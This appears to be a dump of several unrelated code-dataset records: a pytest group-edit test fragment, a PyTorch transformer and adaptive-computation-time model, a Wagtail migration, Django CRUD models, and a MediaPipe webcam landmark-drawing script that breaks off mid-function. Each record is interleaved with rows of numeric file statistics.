random_group_index = random.randrange(l)
group.id = old_groups[random_group_index].id
with pytest.allure.step('I modify the group %s in the list' % group):
if app.group.empty_name(group.id):
app.group.edit_group_by_id(group.id, group)
with pytest.allure.step('the new group list is equal to the old list with the modified group'):
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
old_groups[random_group_index] = group
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
if check_ui:
with pytest.allure.step('check UI'):
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
# тест с индексом
# def test_edit_non_empty_name(app):
# old_groups = app.group.get_group_list()
# group = Group(name="")
# if app.group.count() == 0:
# app.group.create(Group(name="Users"))
# app.group.edit_first_group(group)
# app.group.delete_first_group()
# new_groups = app.group.get_group_list()
# assert len(old_groups) == len(new_groups)
# else:
# index = randrange(len(old_groups))
# if app.group.empty_name(index):
# group.id = old_groups[index].id
# app.group.edit_group_by_index(index, group)
# assert len(old_groups) == app.group.count()
# new_groups = app.group.get_group_list()
# old_groups[index] = group
# assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
| 48.565574
| 133
| 0.582954
| 801
| 5,925
| 4.058677
| 0.088639
| 0.088588
| 0.059059
| 0.051676
| 0.851738
| 0.84128
| 0.830514
| 0.806829
| 0.792064
| 0.792064
| 0
| 0.001946
| 0.306329
| 5,925
| 121
| 134
| 48.966942
| 0.789051
| 0.225485
| 0
| 0.8
| 0
| 0
| 0.097497
| 0
| 0
| 0
| 0
| 0
| 0.15
| 1
| 0.0375
| false
| 0
| 0.0375
| 0
| 0.075
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d6210edd53242f12fbb0b0534d1626cd7e8cb2bd
| 16,153
|
py
|
Python
|
transformers/transformer_models.py
|
TomMakkink/transformers-for-rl
|
9d025f92611e957004030af9ef05a07e320856a7
|
[
"MIT"
] | 1
|
2022-03-09T20:44:27.000Z
|
2022-03-09T20:44:27.000Z
|
transformers/transformer_models.py
|
TomMakkink/transformers-for-rl
|
9d025f92611e957004030af9ef05a07e320856a7
|
[
"MIT"
] | null | null | null |
transformers/transformer_models.py
|
TomMakkink/transformers-for-rl
|
9d025f92611e957004030af9ef05a07e320856a7
|
[
"MIT"
] | null | null | null |
import math
import torch
import torch.nn as nn
from torch.nn.init import xavier_uniform_
from transformers import PositionalEncoding, RelativeCoordinateEncoding
Tensor = torch.Tensor
class TransformerModel(nn.Module):
"""
Transformer baseclass.
"""
def __init__(
self,
d_model: int,
output_dim: int,
max_sequence_length: int,
submodule,
num_layers: int,
dropout: float,
) -> None:
"""
Args:
d_model: number of expected features in the input.
output_dim: output dimension of the model.
dropout: dropout. Default: 0.0.
"""
super(TransformerModel, self).__init__()
assert isinstance(submodule, nn.Module), "Invalid Transformer submodule. "
self.dropout = dropout
self.pos_encoder = PositionalEncoding(
encoding_type="absolute", d_model=d_model, max_len=max_sequence_length
)
self.dropout = nn.Dropout(dropout)
self.d_model = d_model
self.submodules = nn.ModuleList([submodule for k in range(num_layers)])
self.out_layer = nn.Linear(d_model, output_dim)
self._init_network()
def _init_network(self):
r"""Initiate parameters in the transformer model."""
for p in self.parameters():
if p.dim() > 1:
xavier_uniform_(p)
def forward(self, x: Tensor):
"""
Args:
x: input tensor, of shape: [seq_len, batch_size, features]
Returns:
Transformer output, of shape: [seq_len, batch_size, output_dim]
"""
x = self.pos_encoder(x * math.sqrt(self.d_model))
attn_output_weights = []
for layer in self.submodules:
x, attn_output_weight = layer(x)
attn_output_weights.append(attn_output_weight)
attn_output_weights = torch.stack(attn_output_weights)
return self.out_layer(x), attn_output_weights
class MemoryTransformerModel(nn.Module):
"""
Transformer base model that uses memory.
"""
def __init__(
self,
d_model: int,
output_dim: int,
submodule,
num_layers: int,
num_heads: int,
mem_len: int,
dropout: float,
):
"""
Args:
d_model: number of expected features in the input.
output_dim = output dimension of the model.
"""
super(MemoryTransformerModel, self).__init__()
assert isinstance(submodule, nn.Module), "Invalid Transformer submodule. "
num_heads = num_heads
dim_head = d_model // num_heads
dropout = dropout
self.drop = nn.Dropout(dropout)
self.mem_len = mem_len
self.num_layers = num_layers
self.positional_encoding_layer = PositionalEncoding(
encoding_type="relative",
d_model=d_model,
max_len=None,
)
self.u = nn.Parameter(torch.zeros(num_heads, dim_head))
self.v = nn.Parameter(torch.zeros(num_heads, dim_head))
self.submodules = nn.ModuleList([submodule for k in range(self.num_layers)])
self.output_layer = nn.Linear(d_model, output_dim, bias=False)
def init_mem(self):
if self.mem_len > 0:
mem = []
param = next(self.parameters())
for i in range(self.num_layers + 1):
empty = torch.empty(0, dtype=param.dtype, device=param.device)
mem.append(empty)
return mem
else:
return None
def _update_mem(self, hids, mem, qlen, mlen):
if mem is None:
return None
assert len(hids) == len(mem), "len(hids) != len(mem)"
with torch.no_grad():
new_mem = []
end_idx = mlen + max(0, qlen)
beg_idx = max(0, end_idx - self.mem_len)
for i in range(len(hids)):
cat = torch.cat([mem[i], hids[i]], dim=0)
new_mem.append(cat[beg_idx:end_idx].detach())
return new_mem
def forward(self, inputs: Tensor, mem: Tensor = None):
"""
Args:
inputs: input tensor, of shape: [source_seq_len, batch_size, features]
mem: memory from previous sequence.
Returns:
Transformer output, of shape: [target_seq_len, batch_size, output_dim]
"""
if not mem:
mem = self.init_mem()
qlen, bsz, _ = inputs.size()
mlen = mem[0].size(0) if mem is not None else 0
klen = mlen + qlen
hids = []
pos_seq = torch.arange(
klen - 1, -1, -1.0, dtype=inputs.dtype, device=inputs.device
)
pos_emb = self.positional_encoding_layer(pos_seq)
core_out = self.drop(inputs)
pos_emb = self.drop(pos_emb)
attn_output_weights = []
hids.append(core_out)
for i, layer in enumerate(self.submodules):
mem_i = None if mem is None else mem[i]
core_out, attn_output_weight = layer(
core_out,
pos_emb,
self.u,
self.v,
attn_mask=None,
mem=mem_i,
)
hids.append(core_out)
attn_output_weights.append(attn_output_weight)
attn_output_weights = torch.stack(attn_output_weights)
core_out = self.drop(core_out)
core_out = self.output_layer(core_out)
new_mem = self._update_mem(hids, mem, mlen, qlen)
return core_out, attn_output_weights, new_mem
def reset(self):
self.init_mem()
for layer in self.submodules:
layer.reset()
class AdaptiveComputationalTime(nn.Module):
"""
Adaptive Computational Time: https://arxiv.org/abs/1603.08983.
"""
def __init__(
self,
d_model: int,
output_dim: int,
submodule,
max_sequence_length: int,
max_act_timesteps: int,
halting_threshold: float,
):
"""
Args:
"""
super(AdaptiveComputationalTime, self).__init__()
assert isinstance(submodule, nn.Module), "Invalid Transformer submodule. "
self.pos_encoder = PositionalEncoding(
encoding_type="coordinate",
d_model=d_model,
max_len=max_sequence_length,
)
self.halting_threshold = halting_threshold
self.max_act_timesteps = max_act_timesteps
self.transition = nn.Linear(d_model, 1)
self.sigma = nn.Sigmoid()
# self.submodules == nn.ModuleList()
self.submodule = submodule
self.out_layer = nn.Linear(d_model, output_dim)
def forward(self, inputs: Tensor):
"""
Args:
inputs shape: (sequence_length, batch_size, feature_dim)
"""
halting_probability = torch.zeros(
size=(inputs.shape[0], inputs.shape[1]), device=inputs.device
)
remainders = torch.zeros(
size=(inputs.shape[0], inputs.shape[1]), device=inputs.device
)
n_updates = torch.zeros(
size=(inputs.shape[0], inputs.shape[1]), device=inputs.device
)
previous_state = torch.zeros_like(inputs, device=inputs.device)
step = 0
state = inputs
attn_output_weights = []
while (
(
(halting_probability < self.halting_threshold)
& (n_updates < self.max_act_timesteps)
)
.byte()
.any()
):
# Add coordinate embeddings to the state
state = self.pos_encoder(state)
# Calculate probabilites based on the state
p = self.sigma(self.transition(state)).squeeze(-1)
# Mask for inputs which have not halted yet
still_running = (halting_probability < 1.0).float()
# Mask of inputs which halted at this step
new_halted = (
halting_probability + p * still_running > self.halting_threshold
).float() * still_running
# Mask of inputs which haven't halted, and didn't halt this step
still_running = (
halting_probability + p * still_running <= self.halting_threshold
).float() * still_running
# Add the halting probability for this step to the halting
# probabilities for those input which haven't halted yet
halting_probability = halting_probability + p * still_running
# Compute remainders for the inputs which halted at this step
remainders = remainders + new_halted * (1 - halting_probability)
# Add the remainders to those inputs which halted at this step
halting_probability = halting_probability + new_halted * remainders
# Increment n_updates for all inputs which are still running
n_updates = n_updates + still_running + new_halted
# Compute the weight to be applied to the new state and output
# 0 when the input has already halted
# p when the input hasn't halted yet
# the remainders when it halted this step
update_weights = p * still_running + new_halted * remainders
state, attn_output_weight = self.submodule(state)
attn_output_weights.append(attn_output_weight)
# update running part in the weighted state and keep the rest
previous_state = (state * update_weights.unsqueeze(-1)) + (
previous_state * (1 - update_weights.unsqueeze(-1))
)
step += 1
attn_output_weights = torch.stack(attn_output_weights)
meta_info = {"remainders": remainders, "n_updates": n_updates, "step": step}
return previous_state, attn_output_weights, meta_info
class ACTMemory(nn.Module):
"""
Adaptive Computational Time: https://arxiv.org/abs/1603.08983.
"""
def __init__(
self,
d_model: int,
output_dim: int,
num_heads: int,
submodule,
max_act_timesteps: int,
halting_threshold: float,
mem_len: int,
dropout: float,
):
"""
Args:
"""
super(ACTMemory, self).__init__()
assert isinstance(submodule, nn.Module), "Invalid Transformer submodule. "
self.halting_threshold = halting_threshold
self.max_act_timesteps = max_act_timesteps
self.transition = nn.Linear(d_model, 1)
self.sigma = nn.Sigmoid()
num_heads = num_heads
dim_head = d_model // num_heads
dropout = dropout
self.drop = nn.Dropout(dropout)
self.mem_len = mem_len
self.positional_encoding_layer = RelativeCoordinateEncoding(d_model=d_model)
self.u = nn.Parameter(torch.zeros(num_heads, dim_head))
self.v = nn.Parameter(torch.zeros(num_heads, dim_head))
self.submodule = submodule
self.output_layer = nn.Linear(d_model, output_dim)
def init_mem(self):
if self.mem_len > 0:
mem = []
param = next(self.parameters())
for i in range(self.max_act_timesteps + 1):
empty = torch.empty(0, dtype=param.dtype, device=param.device)
mem.append(empty)
return mem
else:
return None
def _update_mem(self, hids, mem, qlen, mlen):
if mem is None:
return None
# Pad hidden cells that have not been filled
hids_len = len(hids)
for i in range(hids_len, self.max_act_timesteps + 1):
zero_tensor = torch.zeros(
size=(hids[0].shape), dtype=hids[0].dtype, device=hids[0].device
)
hids.append(zero_tensor)
assert len(hids) == len(mem), "len(hids) != len(mem)"
with torch.no_grad():
new_mem = []
end_idx = mlen + max(0, qlen)
beg_idx = max(0, end_idx - self.mem_len)
for i in range(len(hids)):
cat = torch.cat([mem[i], hids[i]], dim=0)
new_mem.append(cat[beg_idx:end_idx].detach())
return new_mem
def forward(self, inputs: Tensor, mem: Tensor = None):
"""
Args:
inputs shape: (sequence_length, batch_size, feature_dim)
"""
if not mem:
mem = self.init_mem()
qlen, bsz, _ = inputs.size()
mlen = mem[0].size(0) if mem is not None else 0
klen = mlen + qlen
hids = []
pos_seq = torch.arange(
klen - 1, -1, -1.0, dtype=inputs.dtype, device=inputs.device
)
state = self.drop(inputs)
hids.append(state)
halting_probability = torch.zeros(
size=(inputs.shape[0], inputs.shape[1]), device=inputs.device
)
remainders = torch.zeros(
size=(inputs.shape[0], inputs.shape[1]), device=inputs.device
)
n_updates = torch.zeros(
size=(inputs.shape[0], inputs.shape[1]), device=inputs.device
)
previous_state = torch.zeros_like(inputs, device=inputs.device)
step = 0
# state = inputs
attn_output_weights = []
while (
(
(halting_probability < self.halting_threshold)
& (n_updates < self.max_act_timesteps)
)
.byte()
.any()
):
# Add coordinate embeddings to the state
pos_emb, time_emb = self.positional_encoding_layer(state, pos_seq)
# Calculate probabilites based on the state
p = self.sigma(self.transition(state)).squeeze(-1)
# Mask for inputs which have not halted yet
still_running = (halting_probability < 1.0).float()
# Mask of inputs which halted at this step
new_halted = (
halting_probability + p * still_running > self.halting_threshold
).float() * still_running
# Mask of inputs which haven't halted, and didn't halt this step
still_running = (
halting_probability + p * still_running <= self.halting_threshold
).float() * still_running
# Add the halting probability for this step to the halting
# probabilities for those input which haven't halted yet
halting_probability = halting_probability + p * still_running
# Compute remainders for the inputs which halted at this step
remainders = remainders + new_halted * (1 - halting_probability)
# Add the remainders to those inputs which halted at this step
halting_probability = halting_probability + new_halted * remainders
# Increment n_updates for all inputs which are still running
n_updates = n_updates + still_running + new_halted
# Compute the weight to be applied to the new state and output
# 0 when the input has already halted
# p when the input hasn't halted yet
# the remainders when it halted this step
update_weights = p * still_running + new_halted * remainders
mem_i = None if mem is None else mem[step]
state, attn_output_weight = self.submodule(
state,
pos_emb,
self.u,
self.v,
attn_mask=None,
mem=mem_i,
)
hids.append(state)
attn_output_weights.append(attn_output_weight)
# update running part in the weighted state and keep the rest
previous_state = (state * update_weights.unsqueeze(-1)) + (
previous_state * (1 - update_weights.unsqueeze(-1))
)
step += 1
attn_output_weights = torch.stack(attn_output_weights)
new_mem = self._update_mem(hids, mem, mlen, qlen)
core_out = self.output_layer(previous_state)
return core_out, attn_output_weights, new_mem
def reset(self):
self.submodule.reset()
| 34.006316
| 84
| 0.582369
| 1,902
| 16,153
| 4.737119
| 0.111462
| 0.031077
| 0.037736
| 0.009323
| 0.820644
| 0.771032
| 0.746393
| 0.729634
| 0.729301
| 0.677248
| 0
| 0.007844
| 0.329103
| 16,153
| 474
| 85
| 34.078059
| 0.823567
| 0.159908
| 0
| 0.712934
| 0
| 0
| 0.016318
| 0
| 0
| 0
| 0
| 0
| 0.018927
| 1
| 0.047319
| false
| 0
| 0.015773
| 0
| 0.113565
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3ac2f2e7ba9f3605cbe311ad5cf6c302cf91760
| 4,719
|
py
|
Python
|
simple/migrations/0002_auto_20170809_2141.py
|
littleweaver/wagtail-project-template
|
34d9b2f659fab2c530902b650e2fc76410b8a22f
|
[
"BSD-3-Clause"
] | 12
|
2018-04-20T20:06:48.000Z
|
2022-03-23T08:11:11.000Z
|
simple/migrations/0002_auto_20170809_2141.py
|
littleweaver/wagtail-project-template
|
34d9b2f659fab2c530902b650e2fc76410b8a22f
|
[
"BSD-3-Clause"
] | 16
|
2018-03-09T22:30:35.000Z
|
2021-09-07T23:36:05.000Z
|
simple/migrations/0002_auto_20170809_2141.py
|
littleweaver/wagtail-project-template
|
34d9b2f659fab2c530902b650e2fc76410b8a22f
|
[
"BSD-3-Clause"
] | 1
|
2019-08-02T20:17:35.000Z
|
2019-08-02T20:17:35.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-09 21:41
from __future__ import unicode_literals
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.embeds.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('simple', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='simplepage',
name='body',
field=wagtail.core.fields.StreamField((('text', wagtail.core.blocks.StructBlock((('text', wagtail.core.blocks.RichTextBlock()), ('background_color', wagtail.core.blocks.ChoiceBlock(choices=[('white', 'White'), ('eastern-blue', 'Eastern Blue'), ('gamboge', 'Gamboge'), ('green', 'Green'), ('pink', 'Pink'), ('red', 'Red'), ('royal-blue', 'Royal Blue'), ('teal', 'Teal'), ('violet', 'Violet'), ('dark-gray', 'Dark Gray')])), ('text_align', wagtail.core.blocks.ChoiceBlock(choices=[('left', 'Left'), ('center', 'Center'), ('right', 'Right')])), ('font_size', wagtail.core.blocks.ChoiceBlock(choices=[('small', 'Small'), ('normal', 'Normal'), ('large', 'Large'), ('jumbo', 'Jumbo')])), ('font_family', wagtail.core.blocks.ChoiceBlock(choices=[('sans-serif', 'Sans Serif'), ('serif', 'Serif')]))), label='Text', template='common/blocks/styled_text_full_bleed.html')), ('image', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', wagtail.core.blocks.ChoiceBlock(choices=[('left', 'Left'), ('right', 'Right'), ('full-width', 'Full Width')]))))), ('raw_html', wagtail.core.blocks.RawHTMLBlock()), ('blockquote', wagtail.core.blocks.StructBlock((('text', wagtail.core.blocks.RichTextBlock()), ('source_text', wagtail.core.blocks.RichTextBlock(required=False)), ('source_url', wagtail.core.blocks.URLBlock(help_text='Source text will link to this url.', required=False))))), ('list', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(label='List Item'), template='common/blocks/list_block_columns.html')), ('video', wagtail.core.blocks.StructBlock((('video', wagtail.embeds.blocks.EmbedBlock()), ('alignment', wagtail.core.blocks.ChoiceBlock(choices=[('left', 'Left'), ('right', 'Right'), ('full-width', 'Full Width')]))))), ('heading_1', wagtail.core.blocks.StructBlock((('content', wagtail.core.blocks.CharBlock()),))), ('heading_2', wagtail.core.blocks.StructBlock((('content', wagtail.core.blocks.CharBlock()),))), ('heading_3', wagtail.core.blocks.StructBlock((('content', wagtail.core.blocks.CharBlock()),))))),
),
migrations.AlterField(
model_name='simplepagewithmenusidebar',
name='body',
field=wagtail.core.fields.StreamField((('text', wagtail.core.blocks.StructBlock((('text', wagtail.core.blocks.RichTextBlock()), ('background_color', wagtail.core.blocks.ChoiceBlock(choices=[('white', 'White'), ('eastern-blue', 'Eastern Blue'), ('gamboge', 'Gamboge'), ('green', 'Green'), ('pink', 'Pink'), ('red', 'Red'), ('royal-blue', 'Royal Blue'), ('teal', 'Teal'), ('violet', 'Violet'), ('dark-gray', 'Dark Gray')])), ('text_align', wagtail.core.blocks.ChoiceBlock(choices=[('left', 'Left'), ('center', 'Center'), ('right', 'Right')])), ('font_size', wagtail.core.blocks.ChoiceBlock(choices=[('small', 'Small'), ('normal', 'Normal'), ('large', 'Large'), ('jumbo', 'Jumbo')])), ('font_family', wagtail.core.blocks.ChoiceBlock(choices=[('sans-serif', 'Sans Serif'), ('serif', 'Serif')]))), label='Text')), ('image', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', wagtail.core.blocks.ChoiceBlock(choices=[('left', 'Left'), ('right', 'Right'), ('full-width', 'Full Width')]))))), ('raw_html', wagtail.core.blocks.RawHTMLBlock()), ('blockquote', wagtail.core.blocks.StructBlock((('text', wagtail.core.blocks.RichTextBlock()), ('source_text', wagtail.core.blocks.RichTextBlock(required=False)), ('source_url', wagtail.core.blocks.URLBlock(help_text='Source text will link to this url.', required=False))))), ('list', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(label='List Item'), template='common/blocks/list_block_columns.html')), ('video', wagtail.core.blocks.StructBlock((('video', wagtail.embeds.blocks.EmbedBlock()), ('alignment', wagtail.core.blocks.ChoiceBlock(choices=[('left', 'Left'), ('right', 'Right'), ('full-width', 'Full Width')]))))), ('heading_1', wagtail.core.blocks.StructBlock((('content', wagtail.core.blocks.CharBlock()),))), ('heading_2', wagtail.core.blocks.StructBlock((('content', wagtail.core.blocks.CharBlock()),))), ('heading_3', wagtail.core.blocks.StructBlock((('content', wagtail.core.blocks.CharBlock()),))))),
),
]
| 157.3
| 2,079
| 0.680017
| 536
| 4,719
| 5.91791
| 0.205224
| 0.173392
| 0.251892
| 0.123581
| 0.871375
| 0.871375
| 0.871375
| 0.871375
| 0.871375
| 0.871375
| 0
| 0.00623
| 0.081585
| 4,719
| 29
| 2,080
| 162.724138
| 0.725658
| 0.01441
| 0
| 0.272727
| 1
| 0
| 0.271084
| 0.03012
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.272727
| 0
| 0.409091
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c3ee00df15a8824ea7ba3f779e43593ff8eee6db
| 1,378
|
py
|
Python
|
vue_crud_data/models.py
|
TakeshiOkamoto/mpp_vue_crud_dj
|
b09c39e82c014c842de66ed86b86c519962e5284
|
[
"Unlicense"
] | null | null | null |
vue_crud_data/models.py
|
TakeshiOkamoto/mpp_vue_crud_dj
|
b09c39e82c014c842de66ed86b86c519962e5284
|
[
"Unlicense"
] | null | null | null |
vue_crud_data/models.py
|
TakeshiOkamoto/mpp_vue_crud_dj
|
b09c39e82c014c842de66ed86b86c519962e5284
|
[
"Unlicense"
] | null | null | null |
from django.db import models
from django.core.validators import MaxLengthValidator
# CRUD
class VueCrudData(models.Model):
class Meta:
db_table = 'vue_crud_data'
verbose_name = 'CRUD'
# 名前
name = models.CharField(verbose_name='名前', \
max_length=100, default='', \
validators=[MaxLengthValidator(100)])
# コメント
comment = models.TextField(verbose_name='コメント',
max_length=1000, default='', \
validators=[MaxLengthValidator(1000)])
# 作成日時
created_at = models.DateTimeField(auto_now_add=True)
# 更新日時
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return '<id=' + str(self.id) + ', name=' + self.name + '>'
# CRUD(BK)
class VueCrudDataBk(models.Model):
class Meta:
db_table = 'vue_crud_data_bk'
verbose_name = 'CRUD(BK)'
# 名前
name = models.CharField(verbose_name='名前', \
max_length=100, default='', \
validators=[MaxLengthValidator(100)])
# コメント
comment = models.TextField(verbose_name='コメント',
max_length=1000, default='', \
validators=[MaxLengthValidator(1000)])
# 作成日時
created_at = models.DateTimeField(auto_now_add=True)
# 更新日時
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return '<id=' + str(self.id) + ', name=' + self.name + '>'
| 26
| 66
| 0.632075
| 156
| 1,378
| 5.358974
| 0.288462
| 0.078947
| 0.167464
| 0.119617
| 0.820574
| 0.820574
| 0.820574
| 0.820574
| 0.820574
| 0.729665
| 0
| 0.026515
| 0.233672
| 1,378
| 52
| 67
| 26.5
| 0.765152
| 0.035559
| 0
| 0.733333
| 0
| 0
| 0.058422
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.066667
| 0.066667
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
61681495be2c98af574716b5dea48d768223ae8c
| 12,164
|
py
|
Python
|
holistic.py
|
anmolmalik01/mediapipe
|
703bb138bc9a3aab7a0b9514708f4ae2fb98fba6
|
[
"MIT"
] | 1
|
2021-12-10T18:20:08.000Z
|
2021-12-10T18:20:08.000Z
|
holistic.py
|
anmolmalik01/mediapipe
|
703bb138bc9a3aab7a0b9514708f4ae2fb98fba6
|
[
"MIT"
] | null | null | null |
holistic.py
|
anmolmalik01/mediapipe
|
703bb138bc9a3aab7a0b9514708f4ae2fb98fba6
|
[
"MIT"
] | null | null | null |
import cv2
import mediapipe as mp
import time
class mediapipe:
# ============================================ init =================================================
def __init__(self):
# mediapipe solutions variable
mp_drawing = mp.solutions.drawing_utils
mp_holistic = mp.solutions.holistic
mp_drawing_styles = mp.solutions.drawing_styles
mp_face_detection = mp.solutions.face_detection
mp_face_mesh = mp.solutions.face_mesh
mp_hands = mp.solutions.hands
mp_pose = mp.solutions.pose
pTime = 0
self.mp_drawing = mp_drawing
self.mp_holistic = mp_holistic
self.mp_drawing_styles = mp_drawing_styles
self.mp_face_detection = mp_face_detection
self.mp_hands = mp_hands
self.mp_pose = mp_pose
self.mp_face_mesh = mp_face_mesh
self.pTime = pTime
# ===================================================================================================
def simple_holistic(self, show_fps=False):
# capturing webcam 0
cap = cv2.VideoCapture(0)
# Initiate holistic model
with self.mp_holistic.Holistic( min_detection_confidence=0.5, min_tracking_confidence=0.5 ) as holistic:
while cap.isOpened():
success, image = cap.read()
if not success:
print("Ignoring empty camera frame.")
continue
# Recolor Feed
image.flags.writeable = False
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# Make Detections
results = holistic.process(image)
# Recolor image back to BGR for rendering
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
# face landmarks
self.mp_drawing.draw_landmarks(
image,
results.face_landmarks,
self.mp_holistic.FACEMESH_CONTOURS,
landmark_drawing_spec=None,
connection_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(0, 167, 196), thickness=2, circle_radius=1)
)
# pose landmarks
self.mp_drawing.draw_landmarks(
image,
results.pose_landmarks,
self.mp_holistic.POSE_CONNECTIONS,
landmark_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(0,0,0), thickness=2, circle_radius=2),
connection_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(255, 255, 255), thickness=3, circle_radius=2)
)
# fliping image
flip_image = cv2.flip(image, 1)
# fps
if show_fps==True:
cTime = time.time()
fps = 1 / (cTime - self.pTime)
self.pTime = cTime
cv2.putText(flip_image, str(int(fps)), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)
# Showimg image
cv2.imshow('MediaPipe Holistic', flip_image)
# quiting
if cv2.waitKey(10) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
# ===================================================================================================
def complex_holistic(self, show_fps=True):
# capturing webcam 0
cap = cv2.VideoCapture(0)
# Initiate holistic model
with self.mp_holistic.Holistic( min_detection_confidence=0.5, min_tracking_confidence=0.5 ) as holistic:
while cap.isOpened():
success, image = cap.read()
if not success:
print("Ignoring empty camera frame.")
continue
# Recolor Feed
image.flags.writeable = False
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# Make Detections
results = holistic.process(image)
# Recolor image back to BGR for rendering
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
# face landmarks
self.mp_drawing.draw_landmarks(
image,
results.face_landmarks,
self.mp_holistic.FACEMESH_TESSELATION,
landmark_drawing_spec=self.mp_drawing.DrawingSpec(color=(255, 255, 255), thickness=1, circle_radius=1),
connection_drawing_spec=self.mp_drawing.DrawingSpec(color=(255, 255, 255), thickness=1, circle_radius=1)
)
# Right hand
self.mp_drawing.draw_landmarks(
image,
results.right_hand_landmarks,
self.mp_holistic.HAND_CONNECTIONS,
landmark_drawing_spec=self.mp_drawing.DrawingSpec(color=(0, 0, 0), thickness=3, circle_radius=3),
connection_drawing_spec=self.mp_drawing.DrawingSpec(color=(255, 255, 255), thickness=2, circle_radius=2)
)
# Left Hand
self.mp_drawing.draw_landmarks(
image,
results.left_hand_landmarks,
self.mp_holistic.HAND_CONNECTIONS,
landmark_drawing_spec=self.mp_drawing.DrawingSpec(color=(0, 0, 0), thickness=3, circle_radius=3),
connection_drawing_spec=self.mp_drawing.DrawingSpec(color=(255, 255, 255), thickness=2, circle_radius=2)
)
# Pose landmarks
self.mp_drawing.draw_landmarks(
image,
results.pose_landmarks,
self.mp_holistic.POSE_CONNECTIONS,
landmark_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(0,0,0), thickness=2, circle_radius=2),
connection_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(255, 255, 255), thickness=3, circle_radius=2)
)
# fliping image
flip_image = cv2.flip(image, 1)
# fps
if show_fps==True:
cTime = time.time()
fps = 1 / (cTime - self.pTime)
self.pTime = cTime
cv2.putText(flip_image, str(int(fps)), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)
# showing fliped image
cv2.imshow('MediaPipe Holistic', flip_image)
# quiting
if cv2.waitKey(10) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
# =========================================================================================================================
def face_mesh(self, show_fps=True, contours=True ):
# capturing webcam 0
cap = cv2.VideoCapture(0)
# Initiate face mesh
with self.mp_face_mesh.FaceMesh( min_detection_confidence=0.5, min_tracking_confidence=0.5 ) as face_mesh:
while cap.isOpened():
success, image = cap.read()
if not success:
print("Ignoring empty camera frame.")
# If loading a video, use 'break' instead of 'continue'.
continue
# Recolor Feed
image.flags.writeable = False
# Make Detections
results = face_mesh.process(image)
# Recolor image back to BGR for rendering
image.flags.writeable = True
# face mesh results
if results.multi_face_landmarks:
for face_landmarks in results.multi_face_landmarks:
self.mp_drawing.draw_landmarks(
image=image,
landmark_list=face_landmarks,
connections=self.mp_face_mesh.FACEMESH_TESSELATION,
landmark_drawing_spec=None,
connection_drawing_spec=self.mp_drawing.DrawingSpec(color=(255, 255, 255), thickness=1, circle_radius=1 )
)
if contours==True:
self.mp_drawing.draw_landmarks(
image=image,
landmark_list=face_landmarks,
connections=self.mp_face_mesh.FACEMESH_CONTOURS,
landmark_drawing_spec=None,
connection_drawing_spec=self.mp_drawing_styles.get_default_face_mesh_contours_style()
)
# fliping image
flip_image = cv2.flip(image, 1)
# fps
if show_fps==True:
cTime = time.time()
fps = 1 / (cTime - self.pTime)
self.pTime = cTime
cv2.putText(flip_image, str(int(fps)), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)
# showing image
cv2.imshow('MediaPipe Holistic', flip_image)
# quiting
if cv2.waitKey(10) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
# ==================================================================================================
def hand_detector(self, show_fps=True):
# Capuring webcam 0
cap = cv2.VideoCapture(0)
